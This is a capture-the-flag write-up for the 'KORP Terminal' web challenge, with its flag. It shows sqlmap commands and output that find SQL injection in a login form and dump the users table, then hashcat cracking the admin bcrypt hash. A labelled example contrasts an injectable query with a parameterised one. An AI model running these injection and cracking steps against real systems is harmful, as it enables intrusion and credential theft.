KORP Terminal
Category: Web
Difficulty: very-easy
Flag: HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}
Challenge
Description
Your faction must infiltrate the KORP™ terminal and gain access to the Legionaries' privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.
This challenge runs in a Docker container, available on GitHub
Site analysis
The site consists of a single form, submitted via POST with the parameters username and password. We can run sqlmap against it to see whether an injection is detected.

$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username,password" --method POST --ignore-code 401 --batch
[...]
[22:26:14] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[22:26:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[22:26:15] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[22:26:16] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[22:26:17] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[22:26:17] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[22:26:18] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[22:26:19] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[22:26:20] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[22:26:20] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'username' is vulnerable.
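The root cause behind that sqlmap result, shown as an added example that is not part of the original writeup or of the challenge's own code: a login lookup that splices `username` into the SQL text, beside the parameterised version, both run against a constructed in-memory SQLite stand-in for the users table (the application's real DBMS and source are not on the page, so the schema is assumed from the dump).

```python
import sqlite3

# Hash copied from the dump in the writeup; the table layout is assumed from it.
ADMIN_HASH = "$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv."


def make_db():
    """Constructed in-memory stand-in for the korp_terminal.users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, password TEXT, username TEXT)")
    conn.execute("INSERT INTO users VALUES (1, ?, 'admin')", (ADMIN_HASH,))
    return conn


def lookup_vulnerable(conn, username):
    """Builds the query by string formatting: the input becomes SQL syntax."""
    sql = f"SELECT id, password FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchone()


def lookup_safe(conn, username):
    """Binds the input as a parameter: it is only ever compared as a value."""
    sql = "SELECT id, password FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()


# Constructed tautology input, the kind of thing sqlmap's boolean tests send.
TAUTOLOGY = "x' OR '1'='1"


def demo():
    """Returns (vulnerable_row, safe_row) for the tautology input."""
    conn = make_db()
    return lookup_vulnerable(conn, TAUTOLOGY), lookup_safe(conn, TAUTOLOGY)


if __name__ == "__main__":
    vuln, safe = demo()
    print("string-built query :", vuln)   # admin row, without knowing the name
    print("parameterised query:", safe)   # None
```

The same fix applies whatever the real back end is: bind `username` and `password` as parameters and the stored hash can only be reached by authenticating, not by rewriting the query.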
Exploiting the SQL injection
The username parameter is vulnerable, so we can try to dump the database.
$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 --dbs --batch
available databases [3]:
[*] information_schema
[*] korp_terminal
[*] test
Among them is the korp_terminal database.
$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 -D korp_terminal --tables --batch
Database: korp_terminal
[1 table]
+-------+
| users |
+-------+
It contains a single table: users
$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 -D korp_terminal -T users --dump --batch
Database: korp_terminal
Table: users
[1 entry]
+----+--------------------------------------------------------------+----------+
| id | password                                                     | username |
+----+--------------------------------------------------------------+----------+
| 1  | $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. | admin    |
+----+--------------------------------------------------------------+----------+
It contains a single account: admin
The password is clearly hashed. Even though we recognise bcrypt, we will run it through hashcat to identify it with certainty, and then take the opportunity to try to crack it.
Cracking the hash
First, save the password hash to a file, here named hashes.txt
I use the rockyou.txt wordlist to try to crack it
$ hashcat hashes.txt
The following 4 hash-modes match the structure of your input hash:
    # | Name                                                       | Category
======+============================================================+======================================
 3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce
We were right, it is indeed bcrypt; on to the brute force.
$ hashcat hashes.txt -m 3200 rockyou.txt
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache built:
* Filename..: ../rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec
$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
And there it is, our password: password123
Retrieving the flag
It is now possible to log in with admin:password123